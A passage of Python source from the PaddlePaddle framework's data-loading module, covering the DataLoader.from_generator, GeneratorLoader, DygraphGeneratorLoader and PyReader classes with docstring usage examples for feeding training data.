return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
elif self._persistent_workers:
if self._iterator is None:
self._iterator = _DataLoaderIterMultiProcess(self)
else:
self._iterator._reset()
return self._iterator
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(image, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)|list(str)): places where the result
data should be converted. If places is list of string, the string in the list
can be ``cpu``, ``gpu:x`` and ``gpu_pinned``, where x is the index of the GPUs.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self, legacy_expected_place):
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self, legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
data = self._reader.read_next_list()
for i in range(len(data)):
data[i] = data[i]._move_to_list()
return data
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__(legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warning('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(
target=__thread_main__, args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
